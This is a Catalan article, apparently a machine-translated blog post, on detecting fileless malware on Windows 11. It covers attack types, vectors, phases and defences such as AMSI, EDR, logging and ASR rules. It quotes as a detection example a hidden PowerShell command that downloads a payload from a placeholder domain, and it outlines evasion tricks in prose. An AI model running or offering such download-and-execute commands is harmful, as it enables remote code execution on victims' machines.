Com detectar el perillós malware fileless (sense arxius) a Windows 11

¿detectar el perillós malware fileless? L'activitat dels atacs sense arxius ha crescut amb força i, a sobre, Windows 11 no és immune. Aquest enfocament evita el disc i es recolza en memòria i eines legítimes del sistema; per això, els antivirus centrats en firmes ho tenen complicat. Si busques com detectar-ho de forma fiable, la resposta és combinar telemetria, anàlisi de comportament i controls del propi Windows.

A l'ecosistema actual conviuen campanyes que abusen de PowerShell, WMI o Mshta, amb tècniques més sofisticades com injeccions en memòria, persistències “sense tocar” el disc i fins i tot abusos de microprogramari. La clau és entendre bé el mapa d'amenaces, les fases d'atac i quins senyals deixen fins i tot quan tot passa dins de RAM.

Què és el malware sense arxius i per què preocupa a Windows 11

Quan parlem d'amenaces filess, ens referim a codi maliciós que no necessita dipositar executables nous al sistema de fitxers per operar. Sol injectar-se en processos ja en marxa i executar-se en RAM, recolzant-se en intèrprets i binaris signats per Microsoft (p. ex., PowerShell, WMI, rundll32, mshta). Això redueix la seva empremta i us permet esquivar motors que només busquen arxius sospitosos.

Fins i tot els documents ofimàtics o PDFs que exploten vulnerabilitats per llançar ordres són considerats part del fenomen, perquè activen execució en memòria sense deixar binaris útils per a lanàlisi. També entra aquí l'abús de macros i DDE a Office, atès que el codi corre en processos legítims com WinWord.

Els atacants combinen enginyeria social (phishing, enllaços en correu brossa) amb trampes tècniques: el clic de l'usuari inicia una cadena on un script descarrega i executa la càrrega final en memòria, evitant deixar rastre al disc. Els objectius van des del robatori de dades a lexecució de ransomware, passant pel moviment lateral silenciós.

Tipologies per empremta al sistema: del 'pur' als híbrids

Per no barrejar conceptes, convé separar les amenaces pel grau dinteracció amb el sistema de fitxers. Aquesta categorització aclareix què persisteix, on viu el codi i quins senyals deixa.

Tipus I: sense activitat de fitxer

El codi maliciós totalment fileless no escriu res al disc. Un exemple clàssic és aprofitar-ne una vulnerabilitat de xarxa (com el vector EternalBlue al seu dia) per implantar una porta del darrere que resideixi a la memòria del nucli (casos com DoublePulsar). Aquí, tot passa en RAM i no hi ha artefactes al sistema de fitxers.

Una altra variant és contaminar el microprogramari de components: BIOS/UEFI, adaptadors de xarxa, perifèrics USB (tècniques tipus BadUSB) o fins i tot subsistemes de la CPU. Persisteixen a reinicis i reinstal·lacions, amb la dificultat afegida que pocs productes inspeccionen firmware. Són atacs complexos, menys freqüents, però perillosos pel sigil i durabilitat.

Tipus II: activitat de fitxer indirecta

Aquí el codi maliciós no “deixa” el seu propi executable, però utilitza contenidors gestionats pel sistema que, en el fons, s'emmagatzemen com a fitxers. Per exemple, backdoors que planten ordres de PowerShell al repositori WMI i disparen la seva execució amb filtres d'esdeveniments. És possible instal·lar-lo des de línia d'ordres sense deixar anar binaris, però el repositori WMI resideix en disc com a base de dades legítima, difícil de netejar sense afectar el sistema.

Des d'un punt de vista pràctic es consideren fileless, perquè aquest contenidor (WMI, Registre, etc.) no és un executable detectable clàssic i la neteja no és trivial. El resultat: persistència sigil·losa amb escassa empremta “tradicional”.

Tipus III: requereix arxius per funcionar

Alguns casos mantenen una persistència 'sense arxius' a nivell lògic, però necessiten un disparador basat en fitxer. L'exemple típic és Kovter: registra un verb de shell per a una extensió aleatòria; en obrir un fitxer amb aquesta extensió, es llança un petit script amb mshta.exe que reconstrueix la cadena maliciosa des del Registre.

El truc és que aquests fitxers “carnada” amb extensions aleatòries no contenen una càrrega útil analitzables, i el gruix del codi viu al Registre (un altre contenidor). Per això es cataloguen com a fileless en impacte, encara que en sentit estricte depenguin d'un o diversos artefactes en disc com a disparador.

Vectors i hosts d'infecció: per on entra i on s'amaga

Per millorar la detecció, és vital mapejar el punt d'entrada i l'amfitrió de la infecció. Aquesta òptica ajuda a dissenyar controls específics ia prioritzar la telemetria adequada.

Explotacions

• Basats en arxius (Tipus III): documents, executables, Flash/Java antics o LNK poden explotar el navegador o el motor que els processa per portar shellcode a memòria. El primer vector és un fitxer, però la càrrega viatja a RAM.
• Basats en xarxa (Tipus I): un paquet que explota una vulnerabilitat (p. ex., a SMB) aconsegueix execució a userland o kernel. WannaCry va popularitzar aquest enfocament: càrrega directa en memòria sense nou fitxer.

Maquinari

• dispositius (Tipus I): firmwares de discs o targetes de xarxa poden alterar-se i introduir codi. Difícil d'inspeccionar i amb persistència fora del sistema operatiu.
• CPU i subsistemes de gestió (Tipus I): tecnologies com ME/AMT d'Intel han demostrat vies per a xarxes i execució fora del SO. Ataca molt baix nivell, amb alt sigil potencial.
• USB (Tipus I): BadUSB permet reprogramar un pendrive per fer-se passar per teclat o NIC i llançar ordres o redirigir trànsit.
• BIOS / UEFI (Tipus I): reprogramació maliciosa del microprogramari (casos com Mebromi) que s'executa abans de l'arrencada de Windows.
• hipervisor (Tipus I): implantar un mini-hipervisor per sota del SO per ocultar la presència. Rar però ja observat en forma de rootkits d'hipervisor.

Execució i injecció

• Basat en arxius (Tipus III): EXE/DLL/LNK o tasques programades que llancen injeccions en processos legítims.
• Macros (Tipus III): VBA a Office pot descodificar i executar càrregues, fins i tot ransomware complet, amb consentiment de l'usuari mitjançant engany.
• Scripts (Tipus II): PowerShell, VBScript o JScript des d'arxiu, línia d'ordres, serveis, Registre o WMI. L'atacant pot teclejar l'script a una sessió remota sense tocar disc.
• Registre d'arrencada (MBR/Boot) (Tipus II): famílies com Petya sobreescriuen el sector d'arrencada per prendre control a l'inici. Està fora del sistema de fitxers, però accessible al SO ia solucions modernes que poden restaurar-lo.

Com operen els atacs fileless: fases i senyals

Tot i que no deixin executables, les campanyes segueixen una lògica de fases. Entendre-les permet vigilar esdeveniments i relacions entre processos que sí que deixen empremta.

• Accés inicial: phishing amb enllaços o adjunts, webs compromeses o credencials robades. Moltes cadenes comencen en un document d'Office que activa una ordre PowerShell.
• persistència: portes del darrere a través de WMI (filtres i subscripcions), claus d'execució del Registre o tasques programades que rellancen scripts sense nou fitxer maliciós.
• Exfiltració: un cop recollida la informació, s'envia fora de la xarxa usant processos de confiança (navegadors, PowerShell, bitsadmin) per barrejar trànsit.

Aquest patró és especialment insidiós perquè els indicadors d'atac s'amaguen en la normalitat: arguments de línia d'ordres, encadenaments de processos, connexions sortints anòmales o accés a API d'injecció.

Tècniques habituals: de la memòria al Registre

Els actors es recolzen en un ventall de mètodes que optimitzen el sigil. Convé conèixer els més comuns per activar deteccions eficaces.

• Resident en memòria: càrrega de payloads a l'espai d'un procés fiable que queda esperant activació. Els rootkits i hooks al nucli eleven el nivell d'ocultació.
• Persistència al Registre: desar blobs xifrats en claus i rehidratar-los des d'un llançador legítim (mshta, rundll32, wscript). L'instal·lador efímer es pot autodestruir per minimitzar l'empremta.
• Suplantació de credencials: amb usuaris i contrasenyes robades, l'atacant executa shells remots i planta accessos silenciosos al Registre o WMI.
• Ransomware 'sense fitxers': el xifratge i la comunicació C2 s'orquesten des de RAM, reduint oportunitats de detecció fins que el dany és visible.
• Kits d'explotació: cadenes automatitzades que detecten vulnerabilitats i despleguen càrregues memory-only després del clic de l'usuari.
• Documents amb codi: macros i mecanismes com DDE que disparen ordres sense desar executables en disc.

Estudis del sector ja van reflectir pics notables: en un període del 2018 es va registrar un augment superior al 90% en atacs basats en scripts i en cadenes amb PowerShell, senyal que el vector és preferit per la seva eficàcia.

El repte per a empreses i proveïdors: per què no n'hi ha prou de bloquejar

Seria temptador desactivar PowerShell o prohibir macros per sempre, però trencaries l'operativa. PowerShell és pilar de ladministració moderna i Office, bàsic en negoci; bloquejar a cegues sovint no és viable.

A més, hi ha maneres d'esquivar controls bàsics: executar PowerShell a través de DLL i rundll32, empaquetar scripts a EXE, portar la teva pròpia còpia de PowerShell o fins a amagar scripts en imatges i extreure'ls en memòria. Per això, la defensa no es pot basar només en negar eines.

Un altre error comú és delegar tota la decisió al núvol: si l'agent ha d'esperar resposta del servidor, perds prevenció en temps real. La telemetria es pot pujar per enriquir, però la mitigació ha de passar a l'endpoint.

Com detectar malware sense arxius a Windows 11: telemetria i comportament

L'estratègia guanyadora és vigilar processos i memòria, no fitxers. Els comportaments maliciosos són més estables que les formes que adopta un arxiu, cosa que els fa idonis per a motors de prevenció.

• AMSI (Antimalware Scan Interface): intercepta scripts a PowerShell, VBScript o JScript fins i tot quan es construeixen dinàmicament en memòria. Excel·lent per capturar cadenes ofuscades abans de la seva execució.
• Monitorització de processos: inici/fi, PID, pares i fills, rutes, línies d'ordres i hashes, a més d'arbres d'execució per entendre la història completa.
• Anàlisi de memòria: detecció d'injeccions, reflectives o càrregues PE sense tocar disc, i revisió de regions executables inusuals.
• Protecció del sector d'arrencada: control i restauració del MBR/EFI en cas de manipulació.

A l'ecosistema Microsoft, Defensar per a Endpoint combina AMSI, supervisió de comportament, escaneig de memòria i ML al núvol per escalar deteccions davant de variants noves o ofuscades. Altres fabricants apliquen enfocaments anàlegs amb motors residents al nucli.

Exemple realista de correlació: del document a PowerShell

Imagina una cadena on l'Outlook descarrega un adjunt, el Word obre el document, s'habilita contingut actiu i es llança PowerShell amb paràmetres sospitosos. Una telemetria adequada mostraria la línia d'ordres (p. ex., ExecutionPolicy Bypass, finestra oculta), la connexió a un domini poc fiable i la creació d'un procés fill que s'instal·la a AppData.

Un agent amb context local és capaç de aturar i revertir l'activitat maliciosa sense intervenció manual, a més de notificar-ho al SIEM o per email/SMS. Alguns productes afegeixen una capa d'atribució de causa arrel (models tipus StoryLine), que apunten no al procés visible (Outlook/Word), sinó al fil maliciós complet i el seu origen per sanejar integralment el sistema.

Un patró de comanda típic que convé vigilar pot assemblar-se a: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');. La lògica no és el string exacte, sinó el conjunt de senyals: bypass de polítiques, finestra oculta, descàrrega clar i execució en memòria.

AMSI, pipeline i rol de cada actor: de l'endpoint al SOC

Més enllà de la captura de scripts, una arquitectura sòlida orquestra passos que faciliten investigació i resposta. Com més evidencieu abans d'executar la càrrega, Millor.

• Interceptació de scripts: AMSI lliura el contingut (encara que es generi al vol) per a anàlisi estàtica i dinàmica en un pipeline de codi maliciós (malware).
• Esdeveniments de procés: es recopilen PIDs, binaris, hashes, rutes i arguments, establint els arbres de procés que van portar a la càrrega final.
• Detecció i reporting: les deteccions s'exposen a la consola del producte i es reenvien a plataformes de xarxa (NDR) per visualitzar campanyes.
• Garanties a l'usuari: encara que un script s'injecti en memòria, el marc AMSI ho intercepta en versions compatibles de Windows.
• Capacitats de l'administrador: configuració de polítiques per habilitar inspecció de scripts, bloquejos sobre la base de comportament i creació dinformes des de la consola.
• Treball del SOC: extracció d'artefactes (UUID de VM, versió de SO, tipus de script, procés iniciador i el seu parent, hashes i línies d'ordres) per recrear la història i aixecar regles futures.

Quan la plataforma permet exportar el buffer de memòria associat a l'execució, els investigadors poden generar noves deteccions i enriquir la defensa davant de variants similars.

Mesures pràctiques a Windows 11: prevenció i hunting

A més de comptar amb un EDR amb inspecció de memòria i AMSI, a Windows 11 pots tancar espais d'atac i millorar la visibilitat amb controls nadius.

• Registre i restriccions a PowerShell: habilita Script Block Logging i Module Logging, aplica modes restringits quan sigui possible i controla l'ús de Bypass/Hidden.
• Regles de Reducció de Superfície d'Atac (ASR): bloqueja llançaments de scripts per processos d'Office i abús de WMI/PSExec quan no siguin necessaris.
• Polítiques de macros d'Office: desactiva per defecte, signatura de macros internes i llistes de confiança estrictes; vigila fluxos DDE heretats.
• Auditoria de WMI i Registre: monitoritza subscripcions d'esdeveniments i claus d'execució automàtica (Run, RunOnce, Winlogon), així com la creació de tasques programades.
• Protecció de l'arrencada: activa Secure Boot, controla integritat de MBR/EFI i valida que no hi hagi modificacions a l'inici.
• Pegat i enduriment: tanca vulnerabilitats explotables a navegadors, components d'Office i serveis de xarxa.
• conscienciació: entrena usuaris i equips tècnics en phishing i senyals de execucions encobertes.

Per al hunting, centra't en volies sobre: ​​creació de processos per Office cap a PowerShell/MSHTA, arguments amb downloadstring/downloadfile, scripts amb ofuscació clara, injeccions reflectives i xarxes sortints a TLDs sospitosos. Creua aquests senyals amb reputació i freqüència per reduir soroll.

Què pot detectar cada motor avui?

Les solucions empresarials de Microsoft combinen AMSI, anàlisi conductual, examinar memòria i protecció del sector d'arrencada, a més de models de ML al núvol per escalar davant d'amenaces noves. Altres fabricants implementen monitorització a nivell del nucli per diferenciar el que és maliciós del que és benigne amb reversió automàtica de canvis.

Un enfocament basat en històries d'execució permet identificar la causa arrel (per exemple, un adjunt d'Outlook que desencadena una cadena) i mitigar tot l'arbre: scripts, claus, tasques i binaris intermedis, evitant quedar-se al símptoma visible.

Errors habituals i com evitar-los

Bloquejar PowerShell sense pla alternatiu d'administració no només és poc pràctic, sinó que existeixen maneres d'invocar-lo indirectament. El mateix amb macros: o les gestiones amb polítiques i firmes, o el negoci patirà. Millor aposta per telemetria i regles de comportament.

Una altra fallada típica és creure que la llista blanca d'aplicacions ho soluciona tot: el fileless es recolza precisament en aplicacions de confiança. El control ha d'observar què fan i com es relacionen, no només si estan permeses.

Amb tot això, el codi maliciós sense arxius deixa de ser un “fantasma” quan vigiles el que realment importa: comportament, memòria i orígens de cada execució. Combinar AMSI, telemetria rica de processos, controls nadius de Windows 11 i una capa EDR amb anàlisi conductual et col·loca en avantatge. Afegeix a l'equació polítiques realistes per a macros i PowerShell, auditoria de WMI/Registre i un hunting que prioritzi línies de comandes i arbres de processos, i tindràs una defensa que talla aquestes cadenes abans que facin soroll.